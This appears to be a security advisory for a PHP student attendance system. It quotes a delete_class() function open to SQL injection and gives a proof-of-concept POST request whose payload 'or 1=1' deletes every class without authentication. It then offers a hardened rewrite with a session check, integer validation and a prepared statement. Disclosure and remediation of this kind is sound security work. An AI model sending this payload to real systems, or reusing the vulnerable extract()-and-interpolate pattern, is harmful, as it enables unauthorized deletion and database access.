Credits:
Reigz Macolor (https://github.com/reigz/)
Tested On:
Affected Version:
Simple Student Attendance System using PHP and MySQL 1.0
Affected Site Page:
/ajax-api.php
Affected Code:
ajax-api.php [function delete_class()]
    public function delete_class(){
        // extract() turns every POST field into a local variable, so $id comes straight from the request body
        extract($_POST);
        // $id is interpolated into the SQL string without escaping or parameter binding
        $delete = $this->conn->query("DELETE FROM `class_tbl` where `id` = '{$id}'");
        if($delete){
            $_SESSION['flashdata'] = [ 'type' => 'success', 'msg' => "Class has been deleted successfully!" ];
            return [ "status" => "success" ];
        }else{
            $_SESSION['flashdata'] = [ 'type' => 'danger', 'msg' => "Class has failed to deleted due to unknown reason!" ];
            return [ "status" => "error", "Class has failed to deleted!" ];
        }
    }
Related CWE:
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Allows SQL Injection: the `id` value comes from untrusted POST data via extract() and is interpolated directly into the DELETE statement, so attacker-controlled SQL is executed on the backend. In the PoC below all classes are deleted without any authentication.
POST /ajax-api.php?action=delete_class HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 19
Connection: close
id=1337'+or+1=1;--+
DELETES all classes without authentication.
An attacker can do the following:
- Run any database query with the same permissions as the web application (the default for this web application is root).
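For comparison, an added hardened rewrite of delete_class() (example code, not the project's own): it requires an authenticated session, validates `id` as an integer, and binds it with a prepared statement. It assumes $this->conn is a mysqli connection and that a logged-in user is marked by $_SESSION['user_id'] (placeholder name; the real application's session key may differ).

```php
<?php
// Hardened example of delete_class(); not the project's own code.
// Assumptions: $this->conn is a mysqli connection, and a logged-in user is
// marked by $_SESSION['user_id'] (placeholder; the real app may use another key).
class ClassApi
{
    private mysqli $conn;

    public function __construct(mysqli $conn)
    {
        $this->conn = $conn;
    }

    public function delete_class(): array
    {
        // 1. Require an authenticated session before any destructive action.
        if (empty($_SESSION['user_id'])) {
            http_response_code(403);
            return ['status' => 'error', 'msg' => 'Authentication required'];
        }

        // 2. Read only the field we need; never extract() the whole POST body.
        $id = filter_input(INPUT_POST, 'id', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($id === false || $id === null) {
            http_response_code(400);
            return ['status' => 'error', 'msg' => 'Invalid class id'];
        }

        // 3. Bind the id as a parameter so it can never alter the SQL structure.
        $stmt = $this->conn->prepare('DELETE FROM `class_tbl` WHERE `id` = ?');
        $stmt->bind_param('i', $id);
        $ok = $stmt->execute();
        $deleted = $stmt->affected_rows;
        $stmt->close();

        if ($ok && $deleted === 1) {
            $_SESSION['flashdata'] = ['type' => 'success', 'msg' => 'Class has been deleted successfully!'];
            return ['status' => 'success'];
        }
        $_SESSION['flashdata'] = ['type' => 'danger', 'msg' => 'Class could not be deleted.'];
        return ['status' => 'error', 'msg' => 'Class could not be deleted.'];
    }
}
```

With the value validated as an integer and bound as a parameter, a body such as the one in the PoC above is rejected at step 2 and could not change the query even if it reached step 3.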